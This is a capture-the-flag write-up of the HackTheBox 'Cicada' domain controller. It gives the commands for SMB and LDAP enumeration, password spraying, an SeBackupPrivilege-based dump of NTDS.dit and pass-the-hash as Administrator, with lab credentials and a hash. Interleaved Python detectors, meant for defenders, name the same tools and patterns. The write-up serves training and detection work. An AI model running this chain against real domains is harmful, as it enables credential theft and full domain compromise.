Machine Overview
Cicada is an easy-rated Windows Active Directory Domain Controller machine from HackTheBox. It focuses on Active Directory enumeration, credential discovery through exposed SMB shares and LDAP metadata, and privilege escalation via SeBackupPrivilege. Initial access is gained by finding a default password in an HR notice file, enumerating domain users, and finding a further password stored in a user account's description field. That in turn gives access to an SMB share containing hardcoded credentials in a PowerShell script. Privilege escalation is achieved by using SeBackupPrivilege to dump the NTDS.dit database and extract the Administrator's password hash.
Enumeration
Network Scanning
We start by performing an nmap scan to identify open ports and services:
nmap -A -oN cicada.nmap 10.10.11.35
Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-15 03:36:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-11-15T03:37:20+00:00; +7h00m04s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-11-15T03:37:20+00:00; +7h00m04s from scanner time.
The scan reveals this is a Windows Domain Controller (CICADA-DC.cicada.htb) with typical AD services:
- Port 53: DNS
- Port 88: Kerberos
- Port 135: RPC Endpoint Mapper
- Port 139/445: SMB
- Port 593: RPC over HTTP
- Port 636: LDAPS (LDAP over SSL)
- Port 3268: Global Catalog (LDAP)
SMB Enumeration
We enumerate available SMB shares:
smbclient -NL //10.10.11.35
Available Shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
The presence of NETLOGON and SYSVOL shares confirms this is a Domain Controller. We also notice two custom shares, DEV and HR, which may contain interesting information.
Initial Credential Discovery
Since the HR share is accessible without authentication, we explore it to look for any exposed information:
smbclient -N //10.10.11.35/HR
Contents:
smb: \> dir
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
We download and examine the Notice from HR.txt file:
smb: \> get "Notice from HR.txt"
File Contents:
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
<...SNIP...>
The HR notice reveals a default password: Cicada$M6Corpb*@Lp#nZp!8. However, we still need to identify which user account uses this password.
User Enumeration
We use netexec to perform RID brute-forcing to enumerate domain users:
netexec smb 10.10.11.35 -u "random" -p "" --rid-brute
Output:
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
<...SNIP...>
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
We extract the discovered usernames and save them to users.txt, then attempt to authenticate with the default password:
netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
Authentication Results:
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
The credentials work for michael.wrightson. We now have authenticated access to the domain.
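The authentication attempts above leave a recognisable trace on the DC's Security log: a single source address producing failed logons (event 4625) against many different accounts within seconds, followed by a successful logon (event 4624) for the one account that accepted the password. The following Python is an added example of how a defender could detect that pattern from exported events; it is not part of this writeup or of any tool used in it. The event records, the source address 10.10.14.5 and the timestamps are constructed sample data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records in the shape a SIEM export might give
# (4625 = failed logon, 4624 = successful logon). All values are made up.
SAMPLE_EVENTS = [
    {"EventID": 4625, "TimeCreated": "2025-11-15T03:40:01", "TargetUserName": "john.smoulder", "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-11-15T03:40:01", "TargetUserName": "sarah.dantelia", "IpAddress": "10.10.14.5"},
    {"EventID": 4624, "TimeCreated": "2025-11-15T03:40:02", "TargetUserName": "michael.wrightson", "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-11-15T03:40:02", "TargetUserName": "david.orelious", "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-11-15T03:40:02", "TargetUserName": "emily.oscars", "IpAddress": "10.10.14.5"},
    # One user mistyping their own password three times: not a spray.
    {"EventID": 4625, "TimeCreated": "2025-11-15T04:10:00", "TargetUserName": "sarah.dantelia", "IpAddress": "10.10.20.7"},
    {"EventID": 4625, "TimeCreated": "2025-11-15T04:10:05", "TargetUserName": "sarah.dantelia", "IpAddress": "10.10.20.7"},
    {"EventID": 4625, "TimeCreated": "2025-11-15T04:10:09", "TargetUserName": "sarah.dantelia", "IpAddress": "10.10.20.7"},
]


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=3):
    """Return one alert per source address that produced failed logons against
    at least `min_accounts` distinct accounts inside `window`. Each alert also
    lists accounts that logged on successfully from that address around the
    burst, which are the ones to treat as compromised."""
    by_ip = defaultdict(list)
    for ev in events:
        rec = dict(ev, ts=datetime.fromisoformat(ev["TimeCreated"]))
        by_ip[rec["IpAddress"]].append(rec)

    alerts = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        failures = [r for r in recs if r["EventID"] == 4625]
        successes = [r for r in recs if r["EventID"] == 4624]
        start = 0
        for end in range(len(failures)):
            # Slide the window so failures[start:end+1] all fall within `window`.
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            targeted = {r["TargetUserName"] for r in failures[start:end + 1]}
            if len(targeted) < min_accounts:
                continue
            # Threshold crossed: report the whole burst that starts at `start`.
            lo = failures[start]["ts"]
            burst = [r for r in failures[start:] if r["ts"] - lo <= window]
            hi = burst[-1]["ts"]
            hit = {r["TargetUserName"] for r in successes
                   if lo - window <= r["ts"] <= hi + window}
            alerts.append({
                "source": ip,
                "first_seen": lo.isoformat(),
                "last_seen": hi.isoformat(),
                "accounts_targeted": sorted({r["TargetUserName"] for r in burst}),
                "accounts_succeeded": sorted(hit),
            })
            break  # one alert per source address is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

The distinct-account count is what separates a spray from a user who simply forgot their password: three failures against one account from 10.10.20.7 produce no alert, while four accounts from 10.10.14.5 do. For SMB/NTLM logons the DC records 4625 with the client address as shown; Kerberos pre-authentication failures are logged as 4771 instead and would need the same grouping applied to that event.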
LDAP Enumeration
With valid credentials for michael.wrightson, we can dump the Active Directory domain information using ldapdomaindump:
ldapdomaindump 10.10.11.35 -u "CICADA.HTB\michael.wrightson" \
-p 'Cicada$M6Corpb*@Lp#nZp!8'
This creates several JSON files containing domain information. We examine domain_users.json for sensitive information and discover that David Orelious has stored his password in his account's description field.
David Orelious Account Details:
{
"attributes": {
<...SNIP...>
"cn": [
"David Orelious"
],
<...SNIP...>
"description": [
"Just in case I forget my password is aRt$Lp#7t*VQ!3"
]
}
<...SNIP...>
}
David Orelious has left his password in his account description: aRt$Lp#7t*VQ!3
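A password in a description field is readable by every authenticated domain user, which is exactly why the ldapdomaindump output exposed it. The following Python is an added example, not part of the writeup or of ldapdomaindump, of an audit a domain administrator could run over a domain_users.json dump to find such entries before an attacker does. The sample JSON, the account names and the embedded secrets are constructed for this example; the heuristic (a credential keyword and/or a complex token with a digit) is an assumption chosen here, not something the page prescribes.

```python
import json
import re
import string

# Constructed sample in the shape ldapdomaindump writes domain_users.json:
# a list of objects whose "attributes" dict maps attribute names to lists.
# Accounts, descriptions and the embedded secrets are made up for this example.
SAMPLE_DOMAIN_USERS = json.dumps([
    {"attributes": {"sAMAccountName": ["svc.backup"],
                    "description": ["Backup service account, owner: IT ops"]}},
    {"attributes": {"sAMAccountName": ["ops.intern"],
                    "description": ["Reminder: my password is Lp#7tVq!3aRt"]}},
    {"attributes": {"sAMAccountName": ["t.temp"],
                    "description": [],
                    "info": ["temp pwd Summer2024!"]}},
    {"attributes": {"sAMAccountName": ["j.doe"],
                    "description": ["Finance, ext. 4411"]}},
])

# Free-text attributes that are typically readable by any authenticated user.
FREE_TEXT_ATTRIBUTES = ("description", "info", "comment")

SECRET_KEYWORD = re.compile(r"\b(?:pass(?:word|wd)?|pwd|cred(?:ential)?s?|secret)\b", re.IGNORECASE)


def looks_like_secret(token: str) -> bool:
    """Complexity heuristic: 8+ characters, at least one digit, and characters
    from at least three of the four classes (lower, upper, digit, punctuation).
    Plain words and words with trailing punctuation do not qualify."""
    if len(token) < 8 or not any(c.isdigit() for c in token):
        return False
    classes = [
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(c in string.punctuation for c in token),
    ]
    return sum(classes) >= 3


def audit_user_attributes(domain_users_json: str, attributes=FREE_TEXT_ATTRIBUTES):
    """Flag accounts whose free-text attributes look like they carry a secret.
    The returned 'value' has every suspicious token masked so the report itself
    does not spread the credential further."""
    findings = []
    for entry in json.loads(domain_users_json):
        attrs = entry.get("attributes", {})
        account = (attrs.get("sAMAccountName") or ["<unknown>"])[0]
        for attr in attributes:
            for value in attrs.get(attr, []):
                has_keyword = bool(SECRET_KEYWORD.search(value))
                tokens = [t for t in value.split() if looks_like_secret(t)]
                if has_keyword and tokens:
                    severity = "high"      # "password is X" with a complex X
                elif has_keyword or tokens:
                    severity = "medium"    # only one of the two signals
                else:
                    continue
                masked = value
                for t in tokens:
                    masked = masked.replace(t, "<redacted>")
                findings.append({"account": account, "attribute": attr,
                                 "severity": severity, "value": masked})
    return findings


if __name__ == "__main__":
    for f in audit_user_attributes(SAMPLE_DOMAIN_USERS):
        print(f"{f['severity']:6} {f['account']:12} {f['attribute']}: {f['value']}")
```

The remediation for a hit is to clear the attribute and rotate the account's password, since anyone who could bind to LDAP may already have read it. The same function works against any JSON with the same list-of-attributes layout, so it can be re-run on each fresh dump as a periodic check.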
SMB Share Access
We authenticate to SMB using David's credentials and enumerate share permissions:
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H 10.10.11.35
Share Permissions:
[+] IP: 10.10.11.35:445 Name: 10.10.11.35 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV READ ONLY
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
David has read access to the DEV and HR shares. Let's explore the DEV share:
smbclient -U 'david.orelious%aRt$Lp#7t*VQ!3' //10.10.11.35/DEV
Contents:
smb: \> dir
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 448026 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (7.7 KiloBytes/sec) (average 7.7 KiloBytes/sec)
We download and examine the PowerShell backup script:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
The script contains hardcoded credentials for emily.oscars with the password Q!3@Lp#M6b*7t*Vt.
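The ConvertTo-SecureString "..." -AsPlainText -Force idiom in the backup script is a pattern that can be searched for mechanically across every script stored on a file share. The following Python is an added example, not part of the writeup, of a small scanner for that and two related patterns (a string literal handed to a PSCredential constructor, and a string literal assigned to a variable whose name suggests a secret). It reports file, line and kind, and masks the secret in its own output. The sample script and its values are constructed for this example; scan_share_mirror assumes the share has been copied to a local directory first.

```python
import re
from pathlib import Path

# Constructed sample resembling a backup script with embedded credentials.
# The account names and secrets below are made up for this example.
SAMPLE_SCRIPT = r'''
$sourceDirectory = "C:\smb"
$username = "svc_backup"
$password = ConvertTo-SecureString "Winter2024!Backup" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$smtpPassword = 'Mail#Secret99'
# Acceptable patterns: the secret is not present in the script text itself
$safePassword = Read-Host -AsSecureString "Enter backup password"
$apiKey = $env:BACKUP_API_KEY
Compress-Archive -Path $sourceDirectory -DestinationPath "D:\Backup\smb.zip"
'''

# Each pattern captures the literal secret in the named group "secret".
PATTERNS = [
    ("secure-string-literal",
     re.compile(r'ConvertTo-SecureString\s+(["\'])(?P<secret>.+?)\1[^\n]*-AsPlainText', re.IGNORECASE)),
    ("pscredential-literal",
     re.compile(r'PSCredential\s*\(\s*[^,]+,\s*(["\'])(?P<secret>.+?)\1', re.IGNORECASE)),
    ("secret-variable-literal",
     re.compile(r'\$\w*(?:pass(?:word|wd)?|pwd|secret|token|apikey)\w*\s*=\s*(["\'])(?P<secret>.+?)\1',
                re.IGNORECASE)),
]


def scan_script_text(text: str, source: str = "<memory>"):
    """Scan PowerShell source for literal credentials. Secrets are never copied
    into the result: only their length and a masked copy of the line are kept."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                secret = match.group("secret")
                findings.append({
                    "source": source,
                    "line": lineno,
                    "kind": kind,
                    "secret_length": len(secret),
                    "snippet": line.replace(secret, "<redacted>").strip(),
                })
    return findings


def scan_share_mirror(root):
    """Walk a local copy of a share and scan every .ps1 file in it."""
    results = []
    for path in Path(root).rglob("*.ps1"):
        results.extend(scan_script_text(path.read_text(errors="replace"), str(path)))
    return results


if __name__ == "__main__":
    for f in scan_script_text(SAMPLE_SCRIPT, "Backup_script.ps1"):
        print(f"{f['source']}:{f['line']} [{f['kind']}] {f['snippet']}")
```

Lines 8 and 9 of the sample show what the scanner accepts: a secret prompted for at run time or pulled from the environment never appears in the script text. For an unattended job like this backup, the usual fix is to run the scheduled task under a group managed service account or to read the credential from a vault at run time, so that a reader of the DEV share gains nothing.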
Initial Access
We use the discovered credentials to authenticate via WinRM:
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Verification:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
Privilege Escalation
Enumerating User Privileges
We check the current user's privileges and group memberships:
whoami /all
Key Findings:
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
<...SNIP...>
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
<...SNIP...>
The user emily.oscars is a member of the Backup Operators group and has SeBackupPrivilege enabled. This privilege lets its holder read any file on the system regardless of its ACL, including the NTDS.dit database, which holds the password hashes of every domain account.
Dumping NTDS.dit
Following the Exploit notes on SeBackupPrivilege and the SeBackupPrivilege GitHub repository, we use diskshadow to create a shadow copy of the system drive (NTDS.dit on the live volume is held open by the directory service), then copy NTDS.dit and the SYSTEM hive (which holds the boot key needed to decrypt the hashes) using SeBackupPrivilege.
Step 1: Create a script for diskshadow
set context persistent nowriters
set metadata c:\programdata\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:
Step 2: Execute diskshadow
diskshadow.exe /s .\diskshadow.txt
Step 3: Upload and Import SeBackupPrivilege DLLs
We need to download the SeBackupPrivilege PowerShell modules from the GitHub repository and upload them to the target:
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
These modules provide PowerShell cmdlets that use SeBackupPrivilege to read files that would normally be inaccessible.
Step 4: Copy NTDS.dit and SYSTEM files
Using the imported modules, we can now copy the NTDS.dit file from the shadow copy and save the SYSTEM registry hive:
Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit c:\programdata\ntds.dit
reg save HKLM\SYSTEM C:\programdata\SYSTEM
Then we download both files to our local machine:
download c:\programdata\ntds.dit
download c:\programdata\SYSTEM
Step 5: Extract Hashes Using secretsdump
On our local machine, we use secretsdump to extract password hashes from the downloaded NTDS.dit and SYSTEM files:
secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Output:
<...SNIP...>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
<...SNIP...>
We successfully extracted the Administrator's NTLM hash: 2b87e7c93a3e8a0ea4a581937016f341
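Each step of the dump above produces a distinct artifact on the DC: the WinRM logon as a Backup Operator is recorded as event 4672 (special privileges assigned to new logon) with SeBackupPrivilege in its PrivilegeList, and with process command-line auditing enabled, the diskshadow run and the reg save of HKLM\SYSTEM appear as 4688 process-creation events. The following Python is an added example, not part of the writeup, of correlating those events per account: a SeBackupPrivilege grant followed within a window by shadow-copy creation, hive export or an ntds reference is reported, while a designated backup account running its normal agent is not. The events, account names, times and process paths are constructed sample data, and svc_backup is an assumed name for a legitimate backup service account.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records; field names follow the Windows event XML
# (4672 = special privileges assigned, 4688 = process creation). All values
# are sample data made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 4672, "TimeCreated": "2025-11-15T05:01:00", "SubjectUserName": "emily.oscars",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeShutdownPrivilege"},
    {"EventID": 4688, "TimeCreated": "2025-11-15T05:02:10", "SubjectUserName": "emily.oscars",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s .\diskshadow.txt"},
    {"EventID": 4688, "TimeCreated": "2025-11-15T05:03:45", "SubjectUserName": "emily.oscars",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SYSTEM C:\programdata\SYSTEM"},
    # Scheduled backup job: same privilege, but no shadow copy or hive export.
    {"EventID": 4672, "TimeCreated": "2025-11-15T23:00:00", "SubjectUserName": "svc_backup",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4688, "TimeCreated": "2025-11-15T23:00:05", "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Program Files\BackupAgent\agent.exe",
     "CommandLine": r"agent.exe --job nightly"},
]

# Process-creation indicators that, after a SeBackupPrivilege grant, suggest a
# credential dump rather than a backup. Matched against path + command line.
SUSPICIOUS_PROCESS = [
    ("shadow-copy", re.compile(r"(?:diskshadow|vssadmin|wbadmin)\.exe", re.IGNORECASE)),
    ("hive-export", re.compile(r"reg(?:\.exe)?\s+save\s+HKLM\\(?:SYSTEM|SAM|SECURITY)", re.IGNORECASE)),
    ("ntds-reference", re.compile(r"ntds\.dit|ntdsutil", re.IGNORECASE)),
]


def detect_backup_privilege_abuse(events, window=timedelta(minutes=30), known_backup_accounts=()):
    """For every 4672 that grants SeBackupPrivilege, look at that account's
    4688 events inside `window` and collect the indicator tags they match.
    One alert is returned per grant that has at least one indicator."""
    known = {a.lower() for a in known_backup_accounts}
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        rec = dict(ev, ts=datetime.fromisoformat(ev["TimeCreated"]))
        by_user[rec["SubjectUserName"].lower()].append(rec)

    alerts = []
    for user, recs in by_user.items():
        grants = [r for r in recs
                  if r["EventID"] == 4672 and "SeBackupPrivilege" in r.get("PrivilegeList", "")]
        for grant in grants:
            indicators = []
            for r in recs:
                if r["EventID"] != 4688 or not (grant["ts"] <= r["ts"] <= grant["ts"] + window):
                    continue
                text = r.get("NewProcessName", "") + " " + r.get("CommandLine", "")
                for tag, pattern in SUSPICIOUS_PROCESS:
                    if pattern.search(text) and tag not in indicators:
                        indicators.append(tag)
            if indicators:
                alerts.append({
                    "user": user,
                    "granted_at": grant["ts"].isoformat(),
                    "indicators": indicators,
                    "known_backup_account": user in known,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_backup_privilege_abuse(SAMPLE_EVENTS, known_backup_accounts=("svc_backup",)):
        print(alert)
```

The known_backup_account flag is there for triage rather than suppression: a backup service account that suddenly runs diskshadow and reg save is still worth a look. The simplest preventive control is the one this machine lacks, namely keeping interactive user accounts out of Backup Operators on domain controllers.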
Administrator Access
We use the extracted hash to perform pass-the-hash authentication:
$ evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
We now have a shell running as the Administrator user.
User & Root Flags
- User: C:\Users\emily.oscars.CICADA\Desktop\user.txt
- Root: C:\Users\Administrator\Desktop\root.txt

